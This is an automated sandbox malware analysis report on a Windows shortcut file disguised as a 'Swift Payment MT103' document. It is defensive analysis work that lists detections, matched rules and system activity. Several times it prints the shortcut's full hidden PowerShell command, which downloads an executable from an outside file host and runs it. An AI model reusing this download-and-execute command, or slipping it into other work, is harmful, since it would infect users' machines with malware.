Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Swift Payment MT103.lnk

Overview

General Information

Sample name:Swift Payment MT103.lnk
Analysis ID:1559104
MD5:70c92f627826616f5fa787c2f337ebe4
SHA1:50b64a1d02e839ac617c3c0d7709ae9fc7517684
SHA256:03bd489ad4cce2c7981c0fe9aae208a72f84c642116950c47af37a26480987d8
Tags:lnkuser-abuse_ch
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Machine Learning detection for sample
Sigma detected: Suspicious Invoke-WebRequest Execution
Suspicious powershell command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • powershell.exe (PID: 2316 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oshi.at/uwmg/Payloas.exe -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oshi.at/uwmg/Payloas.exe -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oshi.at/uwmg/Payloas.exe -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oshi.at/uwmg/Payloas.exe -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", ProcessId: 2316, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oshi.at/uwmg/Payloas.exe -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oshi.at/uwmg/Payloas.exe -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oshi.at/uwmg/Payloas.exe -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", ProcessId: 2316, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oshi.at/uwmg/Payloas.exe -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oshi.at/uwmg/Payloas.exe -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oshi.at/uwmg/Payloas.exe -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", ProcessId: 2316, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oshi.at/uwmg/Payloas.exe -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oshi.at/uwmg/Payloas.exe -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oshi.at/uwmg/Payloas.exe -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", ProcessId: 2316, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://oshi.at/uwmg/Payloas.exeAvira URL Cloud: Label: malware
Source: oshi.atVirustotal: Detection: 6%Perma Link
Source: https://oshi.at/uwmg/Payloas.exeVirustotal: Detection: 5%Perma Link
Source: http://oshi.atVirustotal: Detection: 6%Perma Link
Source: Swift Payment MT103.lnkReversingLabs: Detection: 31%
Source: Swift Payment MT103.lnkVirustotal: Detection: 37%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
Source: Swift Payment MT103.lnkJoe Sandbox ML: detected
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb@ source: powershell.exe, 00000000.00000002.2940220931.00000227E3569000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2960404890.00000227FDA82000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdbpdblib.pdb# source: powershell.exe, 00000000.00000002.2959293332.00000227FD710000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbgement.Automation.pdbstem32\Drivers\DriverDataNUMBER_OF_PROCESSORS=2OS=Windows_NTPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64ProgramData=C:\ProgramDataPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot source: powershell.exe, 00000000.00000002.2940220931.00000227E3569000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.pdb source: powershell.exe, 00000000.00000002.2959293332.00000227FD710000.00000004.00000020.00020000.00000000.sdmp
Source: Joe Sandbox ViewASN Name: SEMSAT-ASCaraniNr100RO SEMSAT-ASCaraniNr100RO
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: oshi.at
Source: powershell.exe, 00000000.00000002.2956509561.00000227F58C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2956509561.00000227F5782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2940710291.00000227E6D2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2940710291.00000227E6CFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oshi.at
Source: powershell.exe, 00000000.00000002.2940710291.00000227E5942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2940710291.00000227E5711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2940710291.00000227E5942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2940710291.00000227E5711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2956509561.00000227F5782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2956509561.00000227F5782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2956509561.00000227F5782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2940710291.00000227E5942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2940710291.00000227E6342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2959798789.00000227FD796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co6
Source: powershell.exe, 00000000.00000002.2956509561.00000227F58C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2956509561.00000227F5782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2940710291.00000227E6A6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2940710291.00000227E6D0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at
Source: powershell.exe, 00000000.00000002.2940710291.00000227E6D32000.00000004.00000800.00020000.00000000.sdmp, Swift Payment MT103.lnkString found in binary or memory: https://oshi.at/uwmg/Payloas.exe
Source: powershell.exe, 00000000.00000002.2940190766.00000227E3515000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/uwmg/payloas.exe
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61723
Source: unknownNetwork traffic detected: HTTP traffic on port 61723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705

System Summary

barindex
Source: Swift Payment MT103.lnkLNK file: -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oshi.at/uwmg/Payloas.exe -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }"
Source: classification engineClassification label: mal92.winLNK@2/6@1/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pqoieonn.cgs.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: Swift Payment MT103.lnkReversingLabs: Detection: 31%
Source: Swift Payment MT103.lnkVirustotal: Detection: 37%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oshi.at/uwmg/Payloas.exe -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: Swift Payment MT103.lnkLNK file: ..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb@ source: powershell.exe, 00000000.00000002.2940220931.00000227E3569000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2960404890.00000227FDA82000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdbpdblib.pdb# source: powershell.exe, 00000000.00000002.2959293332.00000227FD710000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbgement.Automation.pdbstem32\Drivers\DriverDataNUMBER_OF_PROCESSORS=2OS=Windows_NTPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64ProgramData=C:\ProgramDataPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot source: powershell.exe, 00000000.00000002.2940220931.00000227E3569000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.pdb source: powershell.exe, 00000000.00000002.2959293332.00000227FD710000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oshi.at/uwmg/Payloas.exe -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F439FA push eax; retf 0_2_00007FF848F43A31
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F44278 push E95C8E62h; ret 0_2_00007FF848F44299

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
